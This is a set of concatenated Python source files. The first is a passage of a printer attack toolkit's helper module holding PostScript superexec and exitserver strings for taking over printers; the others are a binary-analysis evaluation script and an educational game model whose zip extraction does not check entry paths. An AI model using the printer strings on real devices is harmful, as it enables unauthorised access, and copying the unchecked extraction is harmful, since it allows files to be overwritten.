GREEN = '\x1b[42m' if os.name == 'posix' else ''
MAGENTA = '\x1b[45m' if os.name == 'posix' else ''
RED = '\x1b[41m' if os.name == 'posix' else ''
class Fore():
BLUE = '\x1b[34m' if os.name == 'posix' else ''
CYAN = '\x1b[36m' if os.name == 'posix' else ''
MAGENTA = '\x1b[35m' if os.name == 'posix' else ''
YELLOW = '\x1b[33m' if os.name == 'posix' else ''
class Style():
DIM = '\x1b[2m' if os.name == 'posix' else ''
BRIGHT = '\x1b[1m' if os.name == 'posix' else ''
RESET_ALL = '\x1b[0m' if os.name == 'posix' else ''
NORMAL = '\x1b[22m' if os.name == 'posix' else ''
print(Back.RED + msg + Style.RESET_ALL)
# ----------------------------------------------------------------------
# return first item of list or alternative
def item(mylist, alternative=""):
return next(iter(mylist), alternative)
# split list into chunks of equal size
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
# ----------------------------------------------------------------------
class log():
# open logfile
def open(self, filename):
try:
return open(filename, mode='wb')
except IOError as e:
output().errmsg("Cannot open logfile", e)
return None
# write raw data to logfile
def write(self, logfile, data):
# logfile open and data non-empty
if logfile and data:
try:
logfile.write(data)
except IOError as e:
output().errmsg("Cannot log", e)
# write comment to logfile
def comment(self, logfile, line):
comment = "%" + ("[ " + line + " ]").center(72, '-')
self.write(logfile, os.linesep + comment + os.linesep)
# close logfile
def close(self, logfile):
try:
logfile.close()
except IOError as e:
output().errmsg("Cannot close logfile", e)
# ----------------------------------------------------------------------
class output():
# show send commands (debug mode)
def send(self, str, mode):
if str: print(Back.CYAN + str + Style.RESET_ALL)
if str and mode == 'hex':
print(Fore.CYAN + conv().hex(str, ':') + Style.RESET_ALL)
# show recv commands (debug mode)
def recv(self, str, mode):
if str: print(Back.MAGENTA + str + Style.RESET_ALL)
if str and mode == 'hex':
print(Fore.MAGENTA + conv().hex(str, ':') + Style.RESET_ALL)
# show information
def info(self, msg, eol=None):
if msg: print(Back.BLUE + msg + Style.RESET_ALL, end=eol)
sys.stdout.flush()
# show raw data
def raw(self, msg, eol=None):
if msg: print(Fore.YELLOW + msg + Style.RESET_ALL, end=eol)
sys.stdout.flush()
# show chit-chat
def chitchat(self, msg, eol=None):
if msg: print(Style.DIM + msg + Style.RESET_ALL, end=eol)
sys.stdout.flush()
# show warning message
def warning(self, msg):
if msg: print(Back.RED + msg + Style.RESET_ALL)
# show green message
def green(self, msg):
if msg: print(Back.GREEN + msg + Style.RESET_ALL)
# show error message
def errmsg(self, msg, info=""):
info = str(info).strip()
if info: # monkeypatch to make python error message less ugly
info = item(re.findall('Errno -?\d+\] (.*)', info), '') or info.splitlines()[-1]
info = Style.RESET_ALL + Style.DIM + " (" + info.strip('<>') + ")" + Style.RESET_ALL
if msg: print(Back.RED + msg + info)
# show printer and status
def discover(self, xxx_todo_changeme):
(ipaddr, (device, uptime, status, prstat)) = xxx_todo_changeme
ipaddr = output().strfit(ipaddr, 15)
device = output().strfit(device, 27)
uptime = output().strfit(uptime, 8)
status = output().strfit(status, 23)
if device.strip() != 'device': device = Style.BRIGHT + device + Style.NORMAL
if prstat == '1': status = Back.GREEN + status + Back.BLUE # unknown
if prstat == '2': status = Back.GREEN + status + Back.BLUE # running
if prstat == '3': status = Back.YELLOW + status + Back.BLUE # warning
if prstat == '4': status = Back.GREEN + status + Back.BLUE # testing
if prstat == '5': status = Back.RED + status + Back.BLUE # down
line = (ipaddr, device, uptime, status)
output().info('%-15s %-27s %-8s %-23s' % line)
# recursively list files
def psfind(self, name):
vol = Style.DIM + Fore.YELLOW + item(re.findall("^(%.*%)", name)) + Style.RESET_ALL
name = Fore.YELLOW + const.SEP + re.sub("^(%.*%)", '', name) + Style.RESET_ALL
print("%s %s" % (vol, name))
# show directory listing
def psdir(self, isdir, size, mtime, name, otime):
otime = Style.DIM + "(created " + otime + ")" + Style.RESET_ALL
vol = Style.DIM + Fore.YELLOW + item(re.findall("^(%.*%)", name)) + Style.RESET_ALL
name = re.sub("^(%.*%)", '', name) # remove volume information from filename
name = Style.BRIGHT + Fore.BLUE + name + Style.RESET_ALL if isdir else name
if isdir: print("d %8s %s %s %s %s" % (size, mtime, otime, vol, name))
else: print("- %8s %s %s %s %s" % (size, mtime, otime, vol, name))
# show directory listing
def pjldir(self, name, size):
name = name if size else Style.BRIGHT + Fore.BLUE + name + Style.RESET_ALL
if size: print("- %8s %s" % (size, name))
else: print("d %8s %s" % ("-", name))
# show directory listing
def pcldir(self, size, mtime, id, name):
id = Style.DIM + "(macro id: " + id + ")" + Style.RESET_ALL
print("- %8s %s %s %s" % (size, mtime, id, name))
# show output from df
def df(self, args):
self.info("%-16s %-11s %-11s %-9s %-10s %-8s %-9s %-10s %-10s" % args)
# show fuzzing results
def fuzzed(self, path, cmd, opt):
opt1, opt2, opt3 = opt
if isinstance(opt1, bool): opt1 = (Back.GREEN + str(opt1) + Back.BLUE + " ")\
if opt1 else (Back.RED + str(opt1) + Back.BLUE + " ")
if isinstance(opt2, bool): opt2 = (Back.GREEN + str(opt2) + Back.BLUE + " ")\
if opt2 else (Back.RED + str(opt2) + Back.BLUE + " ")
if isinstance(opt3, bool): opt3 = (Back.GREEN + str(opt3) + Back.BLUE + " ")\
if opt3 else (Back.RED + str(opt3) + Back.BLUE + " ")
opt = opt1, opt2, opt3
self.info("%-35s %-12s %-7s %-7s %-7s" % ((path, cmd) + opt))
# show captured jobs
def joblist(self, xxx_todo_changeme1):
(date, size, user, name, soft) = xxx_todo_changeme1
user = output().strfit(user, 13)
name = output().strfit(name, 22)
soft = output().strfit(soft, 20)
line = (date, size, user, name, soft)
output().info('%-12s %5s %-13s %-22s %-20s' % line)
# show ascii only
def ascii(self, data):
data = re.sub(r"(\x00){10}", "\x00", data) # shorten nullbyte streams
data = re.sub(r"([^ -~])", ".", data) # replace non-printable chars
self.raw(data, "")
# show binary dump
def dump(self, data):
# experimental regex to match sensitive strings like passwords
data = re.sub(r"[\x00-\x06,\x1e]([!-~]{6,}?(?!\\0A))\x00{16}", "START" + r"\1" + "STOP", data)
data = re.sub(r"\00+", "\x00", data) # ignore nullbyte streams
data = re.sub(r"(\x00){10}", "\x00", data) # ignore nullbyte streams
data = re.sub(r"([\x00-\x1f,\x7f-\xff])", ".", data)
data = re.sub(r"START([!-~]{6,}?)STOP", Style.RESET_ALL + Back.BLUE + r"\1" + Style.RESET_ALL + Fore.YELLOW, data)
self.raw(data, "")
# dump ps dictionary
def psdict(self, data, indent=''):
importlib.reload(sys) # workaround for non-ascii output
sys.setdefaultencoding('UTF8')
# convert list to dictionary with indices as keys
if isinstance(data, list):
data = dict(enumerate(data))
# data now is expected to be a dictionary
if len(list(data.keys())) > 0: last = sorted(data.keys())[-1]
for key, val in sorted(data.items()):
type = val['type'].replace('type', '')
value = val['value']
perms = val['perms']
recursion = False
# current enty is a dictionary
if isinstance(value, dict):
value, recursion = '', True
# current enty is a ps array
if isinstance(value, list):
try: # array contains only atomic values
value = ' '.join(x['value'] for x in value)
except: # array contains further list or dict
# value = sum(val['value'], [])
value, recursion = '', True
# value = value.encode('ascii', errors='ignore')
node = '┬' if recursion else '─'
edge = indent + ('└' if key == last else '├')
# output current node in dictionary
print("%s%s %-3s %-11s %-30s %s" % (edge, node, perms, type, key, value))
if recursion: # ...
self.psdict(val['value'], indent + (' ' if key == last else '│'))
# show some information
def psonly(self):
self.chitchat("Info: This only affects jobs printed by a PostScript driver")
# countdown from sec to zero
def countdown(self, msg, sec, cmd):
try:
sys.stdout.write(msg)
for x in reversed(list(range(1, sec+1))):
sys.stdout.write(" " + str(x))
sys.stdout.flush()
time.sleep(1)
print(" KABOOM!")
return True
except KeyboardInterrupt:
print("")
# show horizontal line
def hline(self, len=72):
self.info("─" * len)
# crop/pad string to fixed length
def strfit(self, str, max):
str = str.strip() or "-"
if str.startswith('(') and str.endswith(')'): str = str[1:-1]
# crop long strings
if len(str) > max:
str = str[0:max-1] + "…"
# pad short strings
return str.ljust(max)
# ----------------------------------------------------------------------
class conv():
# return current time
def now(self):
return int(time.time())
# return time elapsed since unix epoch
def elapsed(self, date, div=1, short=False):
date = str(datetime.timedelta(seconds=int(date)/div))
return date.split(",")[0] if short else date
# return date dependend on current year
def lsdate(self, date):
year1 = datetime.datetime.now().year
year2 = datetime.datetime.fromtimestamp(date).year
pdate = '%b %e ' if os.name == 'posix' else '%b %d '
format = pdate + "%H:%M" if year1 == year2 else pdate + " %Y"
return time.strftime(format, time.localtime(date))
# return date plus/minus given seconds
def timediff(self, seconds):
return self.lsdate(self.now() + self.int(seconds) / 1000)
# convert size to human readble value
def filesize(self, num):
num = self.int(num)
for unit in ['B','K','M']:
if abs(num) < 1024.0:
return (("%4.1f%s" if unit == 'M' else "%4.0f%s") % (num, unit))
num /= 1024.0
# remove carriage return from line breaks
def nstrip(self, data):
return re.sub(r'\r\n', '\n', data)
# convert string to hexdecimal
def hex(self, data, sep=''):
return sep.join("{:02x}".format(ord(c)) for c in data)
# convert to ascii character
def chr(self, num):
return chr(self.int(num))
# convert to integer or zero
def int(self, num):
try: n = int(num)
except ValueError: n = 0
return n
# ----------------------------------------------------------------------
class file():
# read from local file
def read(self, path):
try:
with open(path, mode='rb') as f:
data = f.read()
f.close()
return data
except IOError as e:
output().errmsg("Cannot read from file", e)
# write to local file
def write(self, path, data, m='wb'):
try:
with open(path, mode=m) as f:
f.write(data)
f.close()
except IOError as e:
output().errmsg("Cannot write to file", e)
# append to local file
def append(self, path, data):
self.write(path, data, 'ab+')
# ----------------------------------------------------------------------
class conn(object):
# create debug connection object
def __init__(self, mode, debug, quiet):
self.mode = mode
self.debug = debug
self.quiet = quiet
self._file = None
self._sock = socket()
# open connection
def open(self, target, port=9100):
# target is a character device
if os.path.exists(target) \
and stat.S_ISCHR(os.stat(target).st_mode):
self._file = os.open(target, os.O_RDWR)
# treat target as ipv4 socket
else:
m = re.search('^(.+?):([0-9]+)$', target)
if m:
[target, port] = m.groups()
port = int(port)
self._sock.connect((target, port))
# close connection
def close(self, *arg):
# close file descriptor
if self._file: os.close(self._file)
# close inet socket
else: self._sock.close()
# set timeout
def timeout(self, *arg):
self._sock.settimeout(*arg)
# send data
def send(self, data):
if self.debug: output().send(self.beautify(data), self.debug)
# send data to device
if self._file: return os.write(self._file, data)
# send data to socket
elif self._sock: return self._sock.sendall(data.encode())
# receive data
def recv(self, bytes):
# receive data from device
if self._file: data = os.read(self._file, bytes).decode()
# receive data from socket
else: data = self._sock.recv(bytes).decode()
# output recv data when in debug mode
if self.debug: output().recv(self.beautify(data), self.debug)
return data
# so-many-seconds-passed bool condition
def past(self, seconds, watchdog):
return int(watchdog * 100) % (seconds * 100) == 0
# connection-feels-slow bool condition
def slow(self, limit, watchdog):
return not (self.quiet or self.debug) and watchdog > limit
# receive data until a delimiter is reached
def recv_until(self, delimiter, fb=True, crop=True, binary=False):
data = ""
sleep = 0.01 # pause in recv loop
limit = 3.0 # max watchdog overrun
wd = 0.0 # watchdog timeout counter
r = re.compile(delimiter, re.DOTALL)
s = re.compile("^\x04?\x0d?\x0a?" + delimiter, re.DOTALL)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
while not r.search(data):
data += self.recv(4096) # receive actual data
if self.past(limit, wd): wd_old, bytes = wd, len(data)
wd += sleep # workaround for endless loop w/o socket timeout
time.sleep(sleep) # happens on some devices - python socket error?
# timeout plus it seems we are not receiving data anymore
if wd > self._sock.gettimeout() and wd >= wd_old + limit:
if len(data) == bytes:
output().errmsg("Receiving data failed", "watchdog timeout")
break
# visual feedback on large/slow data transfers
if self.slow(limit, wd) and self.past(0.1, wd) and len(data) > 0:
output().chitchat(str(len(data)) + " bytes received\r", '')
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# clear current line from 'so-many bytes received' chit-chat
if self.slow(limit, wd): output().chitchat(' ' * 24 + "\r", '')
# warn if feedback expected but response empty (= delimiter only)
# this also happens for data received out of order (e.g. brother)
if fb and s.search(data): output().chitchat("No data received.")
# remove delimiter itself from data
if crop: data = r.sub('', data)
# crop uel sequence at the beginning
data = re.sub(r'(^' + const.UEL + ')', '', data)
'''
┌─────────────────────────────────────────────────────────────────────────┐
│ delimiters -- note that carriage return (0d) is optional in ps/pjl │
├─────────────────────────┬─────────────────────────┬─────────────────────┤
│ │ PJL │ PostScript │
├─────────────────────────┼─────────┬───────────────┼────────┬────────────┤
│ │ send │ recv │ send │ recv │
├─────────────────────────┼─────────┼───────────────┼────────┼────────────┤
│ normal commands (ascii) │ 0d? 0a │ 0d+ 0a 0c 04? │ 0d? 0a │ 0d? 0a 04? │
├─────────────────────────┼─────────┼───────────────┼────────┼────────────┤
│ file transfers (binary) │ 0d? 0a │ 0c │ 0d? 0a │ - │
└─────────────────────────┴─────────┴───────────────┴────────┴────────────┘
'''
# crop end-of-transmission chars
if self.mode == 'ps':
data = re.sub(r'^\x04', '', data)
if not binary: data = re.sub(r'\x0d?\x0a\x04?$', '', data)
else: # pjl and pcl mode
if binary: data = re.sub(r'\x0c$', '', data)
else: data = re.sub(r'\x0d+\x0a\x0c\x04?$', '', data)
# crop whitespaces/newline as feedback
if not binary: data = data.strip()
return data
# beautify debug output
def beautify(self, data):
# remove sent/recv uel sequences
data = re.sub(r'' + const.UEL, '', data)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if self.mode == 'ps':
# remove sent postscript header
data = re.sub(r'' + re.escape(const.PS_HEADER), '', data)
# remove sent postscript hack
data = re.sub(r'' + re.escape(const.PS_IOHACK), '', data)
# remove sent delimiter token
data = re.sub(r'\(DELIMITER\d+\\n\) print flush\n', '', data)
# remove recv delimiter token
data = re.sub(r'DELIMITER\d+', '', data)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
elif self.mode == 'pjl':
# remove sent/recv delimiter token
data = re.sub(r'@PJL ECHO\s+DELIMITER\d+', '', data)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
elif self.mode == 'pcl':
# remove sent delimiter token
data = re.sub(r'\x1b\*s-\d+X', '', data)
# remove recv delimiter token
data = re.sub(r'PCL\x0d?\x0a?\x0c?ECHO -\d+', '', data)
# replace sent escape sequences
data = re.sub(r'(' + const.ESC + ')', '<Esc>', data)
pass
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# replace lineseps in between
data = re.sub(r'\x0d?\x0a?\x0c', os.linesep, data)
# remove eot/eof sequences
data = data.strip(const.EOF)
return data
# ----------------------------------------------------------------------
class const(): # define constants
SEP = '/' # use posixoid path separator
EOL = '\r\n' # line feed || carriage return
ESC = '\x1b' # used to start escape sequences
UEL = ESC + '%-12345X' # universal exit language
EOF = EOL + '\x0c\x04' # potential end of file chars
DELIMITER = "DELIMITER" # delimiter marking end of repsonse
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PS_CATCH = '%%\[ (.*)\]%%'
PS_ERROR = '%%\[ Error: (.*)\]%%'
PS_FLUSH = '%%\[ Flushing: (.*)\]%%'
PS_PROMPT = '>' # TBD: could be derived from PS command 'prompt'
PS_HEADER = '@PJL ENTER LANGUAGE = POSTSCRIPT\n%!\n'
PS_GLOBAL = 'true 0 startjob pop\n' # 'serverdict begin 0 exitserver'
PS_SUPER = '\n1183615869 internaldict /superexec get exec'
PS_NOHOOK = '/nohook true def\n'
PS_IOHACK = '/print {(%stdout) (w) file dup 3 2 roll writestring flushfile} def\n'\
'/== {128 string cvs print (\\n) print} def\n'
PCL_HEADER = '@PJL ENTER LANGUAGE = PCL' + EOL + ESC
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
SUPERBLOCK = '31337' # define super macro id to contain pclfs table
BLOCKRANGE = list(range(10000,20000)) # use those macros for file content
FILE_EXISTS = -1 # file size to be returned if file/dir size unknown
NONEXISTENT = -2 # file size to be returned if a file does not exist
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PS_VOL = '' # no default volume in ps (read: any, write: first)
PJL_VOL = '0:' + SEP # default pjl volume name || path seperator
| RUB-NDS/PRET | helper.py | Python | gpl-2.0 | 21,528 |
#!/usr/bin/python
# This research is supported by the European Union Seventh Framework Programme (FP7/2007-2013), project ASPIRE (Advanced Software Protection: Integration, Research, and Exploitation), under grant agreement no. 609734; on-line at https://aspire-fp7.eu/. */
# The development of portions of the code contained in this file was sponsored by Samsung Electronics UK. */
import math
import sys
est_file = sys.argv[1]
ref_file = sys.argv[2]
# returns map[ins]->id
def read_mapping(f):
m = {}
for line in open(f):
s = line.split(',')
ins = int(s[0], base=16)
id = int(s[1])
if id != -1:
m[ins] = id
return m
# Gets a map[group_id] -> set(ins)
def make_grouping(m):
cs = {}
for ins, id in m.iteritems():
if id in cs:
cs[id].add(ins)
else:
cs[id] = set()
cs[id].add(ins)
return cs
def make_grouping_ida(m):
cs = {}
for ins, id in m.iteritems():
if id == 1:
continue
if id in cs:
cs[id].add(ins)
else:
cs[id] = set()
cs[id].add(ins)
return cs
# Given a cluster (estimated: set(ins)), get its classes (reference, set(ins))
def classes_for_cluster(cluster, ref_map):
classes = set()
for ins in cluster:
# TODO if ins not in ref_map
if ins in ref_map:
classes.add(ref_map[ins])
return classes
# cluster: set(ins), return: purity(float)
def purity_of_cluster(cluster, ref_map):
classes = classes_for_cluster(cluster, ref_map)
m = float(0)
n_c = float(len(cluster))
for c in classes:
c_count = float(0)
for i in cluster:
if i in ref_map and ref_map[i] == c: # TODO: not in ref_map?
c_count+=1
m = max(m, c_count/n_c)
return m
def purity(clusters, ref_map):
maxes = {}
n = float(len(ref_map))
p = float(0)
for c in clusters:
n_c = float(len(clusters[c]))
p += purity_of_cluster(clusters[c], ref_map) * n_c / n
return p
def entropy_of_cluster(cluster, ref_map):
classes = classes_for_cluster(cluster, ref_map)
e = float(0)
n_c = len(cluster)
for c in classes:
c_count = float(0)
for i in cluster:
if i in ref_map and ref_map[i] == c: # TODO: not in ref_map?
c_count+=1
#e += c_count / c_
e = e + c_count/n_c * math.log(c_count/n_c)
return - e
def entropy(clusters, ref_map):
maxes = {}
n = len(ref_map)
e = float(0)
for c in clusters:
n_c = len(clusters[c])
e += entropy_of_cluster(clusters[c], ref_map) * n_c / n
return e
def FN(ida_clusters, ida_mapping, truth_clusters):
seen = set()
fn = float(0)
tot = float(0)
for fun in truth_clusters:
fun_insts = truth_clusters[fun]
fn_fun = 0
tot_fun = 0
for inst in fun_insts:
if inst in seen:
continue
seen.add(inst)
if inst in ida_mapping:
id = ida_mapping[inst]
if id in ida_clusters:
ida_fun = ida_clusters[id]
else:
ida_fun = set()
else:
ida_fun = set()
for inst_j in fun_insts:
if inst_j in seen:
continue
tot_fun += 1
if inst_j not in ida_fun:
fn_fun += 1
fn += float(fn_fun) / float(len(fun_insts))
tot += float(tot_fun) / float(len(fun_insts))
return (fn, float(fn)/float(tot))
def FP(ida_clusters, truth_clusters, truth_mapping):
seen = set()
fp = float(0)
tot = float(0)
#max_fp = 0
#start_fp = 0
for fun in ida_clusters:
fun_insts = ida_clusters[fun]
#start_fp = fp
fp_fun = 0
tot_fun = 0
for inst in fun_insts:
if inst in seen:
continue
seen.add(inst)
if inst in truth_mapping:
id = truth_mapping[inst]
if id in truth_clusters:
truth_fun = truth_clusters[id]
else:
truth_fun = set()
else:
truth_fun = set()
for inst_j in fun_insts:
if inst_j in seen:
continue
tot_fun += 1
if inst_j not in truth_fun:
fp_fun += 1
fp += float(fp_fun) / float(len(fun_insts))
tot += float(tot_fun) / float(len(fun_insts))
#if fp - start_fp > max_fp:
# print "New largest cluster @ %s, size %i" % (str(fun_insts), fp - max_fp)
# max_fp = fp - start_fp
#print "tot = %i" % tot
return (fp, float(fp)/float(tot))
def metrics(ref_map, est_map, metric):
#ref = make_grouping(ref_map)
clusters = make_grouping(est_map)
print "Number of classes: %i" % len(clusters)
print "Number of instructions: %i" % len(est_map)
p = metric(clusters, ref_map)
print "The evaluation of the mapping: %f" % p
#reference_mapping = read_mapping("E:\\tmp\\reference_mapping_%s" % f)
#estimated_mapping = read_mapping("E:\\tmp\\estimated_mapping_%s" % f)
reference_mapping = read_mapping(ref_file)
estimated_mapping = read_mapping(est_file)
reference_functions = make_grouping(reference_mapping)
estimated_functions = make_grouping_ida(estimated_mapping)
fn = FN(estimated_functions, estimated_mapping, reference_functions)
print "FN,%i,%f" % (fn[0], fn[1])
#fp = FP(estimated_functions, reference_functions, reference_mapping)
#print "FP,%i,%f" % (fp[0], fp[1])
#print "FP,%i,%f,FN,%i,%f" % (fp[0], fp[1], fn[0], fn[1])
#for m in [purity, entropy]:
#print "BEGIN %s METRICS: " % str(m)
#print ""
#print "reference -> estimated"
#metrics(reference_mapping, estimated_mapping, m)
#print ""
#print "estimated -> reference"
#metrics(estimated_mapping, reference_mapping, m)
#print ""
#print "========="
| diablo-rewriter/diablo | obfuscation/diversity_engine/iterative_diablo/function_classification_evaluation.py | Python | gpl-2.0 | 5,609 |
# Copyright (C) 2006, 2007, 2008 One Laptop per Child
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import shutil
from xml.etree.ElementTree import Element, SubElement, tostring, parse
from os import environ, makedirs, chmod
from os.path import join, basename, isdir, split, normpath, exists
import logging
import random
from gi.repository import GObject
import zipfile
import tempfile
from sugar3.activity.activity import get_activity_root
ART4APPS_IMAGE_PATH = ''
ART4APPS_AUDIO_PATH = ''
USE_ART4APPS = False
art4apps_data = None
try:
import art4apps
USE_ART4APPS = True
ART4APPS_IMAGE_PATH = art4apps.IMAGES_PATH
ART4APPS_AUDIO_PATH = art4apps.AUDIO_PATH
art4apps_data = art4apps.Art4Apps()
except ImportError:
pass
DEFAULT_FONT = 'Sans'
class Pair(GObject.GObject):
__gproperties__ = {
'aimg': (str, None, None, None, GObject.PARAM_READWRITE),
'asnd': (str, None, None, None, GObject.PARAM_READWRITE),
'achar': (str, None, None, None, GObject.PARAM_READWRITE),
'bimg': (str, None, None, None, GObject.PARAM_READWRITE),
'bsnd': (str, None, None, None, GObject.PARAM_READWRITE),
'bchar': (str, None, None, None, GObject.PARAM_READWRITE),
'aspeak': (str, None, None, None, GObject.PARAM_READWRITE),
'bspeak': (str, None, None, None, GObject.PARAM_READWRITE),
'color': (GObject.TYPE_INT, 'Base', 'Base', 0, 10, 0,
GObject.PARAM_READWRITE)
}
def __init__(self):
GObject.GObject.__init__(self)
self._properties = {'aimg': None, 'asnd': None, 'achar': None,
'bimg': None, 'bsnd': None, 'bchar': None,
'color': 100, 'aspeak': None, 'bspeak': None}
def do_get_property(self, pspec):
"""Retrieve a particular property from our property dictionary
"""
if pspec.name == "aimg":
return self._properties["aimg"]
elif pspec.name == "asnd":
return self._properties["asnd"]
elif pspec.name == "achar":
return self._properties["achar"]
elif pspec.name == "bimg":
return self._properties["bimg"]
elif pspec.name == "bsnd":
return self._properties["bsnd"]
elif pspec.name == "bchar":
return self._properties["bchar"]
elif pspec.name == "color":
return self._properties["color"]
elif pspec.name == "aspeak":
return self._properties["aspeak"]
elif pspec.name == "bspeak":
return self._properties["bspeak"]
def set_property(self, name, value):
if name == 'aimg':
self._properties['aimg'] = value
elif name == "asnd":
self._properties["asnd"] = value
elif name == "achar":
self._properties["achar"] = value
elif name == "bimg":
self._properties["bimg"] = value
elif name == "bsnd":
self._properties["bsnd"] = value
elif name == "bchar":
self._properties["bchar"] = value
elif name == "color":
self._properties["color"] = value
elif name == "aspeak":
self._properties["aspeak"] = value
elif name == "bspeak":
self._properties["bspeak"] = value
class Model(object):
''' The model of the activity. Contains methods to read and write
the configuration for a game from xml. Stores the pairs and grid
information.
'''
def __init__(self, game_path=None):
tmp_root = join(environ['SUGAR_ACTIVITY_ROOT'], 'instance')
self.temp_folder = tempfile.mkdtemp(dir=tmp_root)
chmod(self.temp_folder, 0o777)
self.data = {}
if game_path is None:
game_path = get_activity_root()
if isdir(game_path):
self.game_path = game_path
else:
logging.error('Game_path not found in %s' % game_path)
return
self.data['face'] = ''
self.data['align'] = '1'
self.data['divided'] = '0'
self.data['equal_pairs'] = '0'
self.data['font_name1'] = DEFAULT_FONT
self.data['font_name2'] = DEFAULT_FONT
self.pairs = {}
self.grid = []
# used to know if the game should be saved and reloaded
self.modified = False
logging.debug('Model init is_demo False')
self.is_demo = False
# used by the leader of the game to keep track of the game state
self.players = {}
self.player_active = 0
self.selected = 0
self.turn = 0
self.started = 0
self.count = 0
def mark_modified(self):
logging.debug('Model mark_modified is_demo False')
self.is_demo = False
self.modified = True
self.data['mode'] = 'file'
def read(self, game_file):
self.modified = False
self.count = 0
self.data['key'] = basename(game_file)
self.data['game_file'] = game_file
self.data['path'] = self.temp_folder
self.data['pathimg'] = join(self.data['path'], 'images')
self.data['pathsnd'] = join(self.data['path'], 'sounds')
''' extracts files in the zip file '''
zipFile = zipfile.ZipFile(game_file, "r")
for each in zipFile.namelist():
if not each.endswith('/'):
root, name = split(each)
directory = normpath(join(self.data['path'], root))
if not isdir(directory):
makedirs(directory)
open(join(directory, name), 'wb').write(zipFile.read(each))
self.pairs = {}
''' reads the configuration from an xml file '''
try:
xml_file = join(environ['SUGAR_ACTIVITY_ROOT'],
self.data['path'], 'game.xml')
doc = parse(xml_file)
if doc:
memorize_elem = doc.getroot()
attributes = memorize_elem.attrib
if 'name' in attributes:
self.data['name'] = attributes['name']
if 'scoresnd' in attributes:
self.data['scoresnd'] = attributes['scoresnd']
if 'winsnd' in attributes:
self.data['winsnd'] = attributes['winsnd']
if 'divided' in attributes:
self.data['divided'] = attributes['divided']
if 'face' in attributes:
self.data['face'] = attributes['face']
if 'face1' in attributes:
self.data['face1'] = attributes['face1']
if 'face2' in attributes:
self.data['face2'] = attributes['face2']
if 'align' in attributes:
self.data['align'] = attributes['align']
if 'equal_pairs' in attributes:
self.data['equal_pairs'] = attributes['equal_pairs']
if 'font_name1' in attributes:
self.data['font_name1'] = attributes['font_name1']
if 'font_name2' in attributes:
self.data['font_name2'] = attributes['font_name2']
if 'origin' in attributes:
self.data['origin'] = attributes['origin']
if self.data['origin'] == 'art4apps':
self.data['pathimg'] = ART4APPS_IMAGE_PATH
if 'language' in attributes:
language = attributes['language']
else:
language = 'en'
self.data['pathsnd'] = join(ART4APPS_AUDIO_PATH,
language)
idpair = 0
for elem in list(memorize_elem):
attributes = elem.attrib
pair = Pair()
for attribute in list(attributes.keys()):
if(attribute == 'text'):
pass
else:
pair.set_property(attribute,
attributes[attribute])
self.pairs[str(idpair)] = pair
idpair += 1
else:
logging.error('Read: Error in validation of the file')
return 1
return 0
except Exception as e:
logging.error('Read: Error parsing file ' + str(e))
return 2
def read_art4apps(self, category, language):
"""
Create a game dinamically, based in the art4apps resources
"""
self.modified = False
self.count = 0
self.data['game_file'] = '%s_%s' % (category, language)
self.data['origin'] = 'art4apps'
self.data['language'] = language
self.data['path'] = self.temp_folder
self.data['pathimg'] = ART4APPS_IMAGE_PATH
self.data['pathsnd'] = join(ART4APPS_AUDIO_PATH, language)
idpair = 0
self.pairs = {}
for word in art4apps_data.get_words_by_category(category):
image_filename = art4apps_data.get_image_filename(word)
if os.path.exists(image_filename):
pair = Pair()
label = word
if language != 'en':
label = art4apps_data.get_translation(word, language)
pair.set_property('achar', label)
pair.set_property('bimg', basename(image_filename))
snd_filename = art4apps_data.get_audio_filename(word,
language)
if snd_filename is not None:
pair.set_property('asnd', basename(snd_filename))
else:
aspeak = language
if language == 'en':
aspeak = "en-us"
elif language == 'es':
aspeak = "es-la"
elif language in ['fr', 'ht']:
aspeak = "fr-fr"
pair.set_property('aspeak', aspeak)
self.pairs[str(idpair)] = pair
idpair += 1
self.data['divided'] = '1'
self.data['face1'] = '1'
self.data['face2'] = '2'
self.data['equal_pairs'] = '0'
self.data['font_name1'] = 'Sans'
self.data['font_name2'] = 'Sans'
return 0
def write(self):
''' writes the configuration to an xml file '''
game_props = {}
if(self.data.get('name', None) is not None):
game_props["name"] = self.data['name']
if(self.data.get('divided', None) is not None):
game_props['divided'] = '1'
game_props['face1'] = '1'
game_props['face2'] = '2'
else:
game_props['divided'] = '0'
if 'origin' in self.data:
game_props['origin'] = self.data['origin']
if 'language' in self.data:
game_props['language'] = self.data['language']
if(self.data.get('equal_pairs', None) is not None):
game_props['equal_pairs'] = self.data['equal_pairs']
if(self.data.get('font_name1', None) is not None):
game_props['font_name1'] = self.data['font_name1']
if(self.data.get('font_name2', None) is not None):
game_props['font_name2'] = self.data['font_name2']
if(self.data.get('scoresnd', None) is not None):
game_props["scoresnd"] = self.data['scoresnd']
if(self.data.get('winsnd', None) is not None):
game_props["winsnd"] = self.data['winsnd']
if(self.data.get('divided', None) is not None):
game_props["divided"] = self.data['divided']
if(self.data.get('face', None) is not None):
game_props["face"] = self.data['face']
if(self.data.get('face1', None) is not None):
game_props["face1"] = self.data['face1']
if(self.data.get('face2', None) is not None):
game_props["face2"] = self.data['face2']
if(self.data.get('align', None) is not None):
game_props["align"] = self.data['align']
root = Element("memorize", game_props)
for key in self.pairs:
pair_props = {}
for e in ["aimg", "asnd", "achar", "bimg", "bsnd",
"bchar", "aspeak", "bspeak"]:
if self.pairs[key].get_property(e) is not None:
if self.pairs[key].get_property(e) is False:
pair_props[e] = ""
else:
pair_props[e] = self.pairs[key].get_property(e)
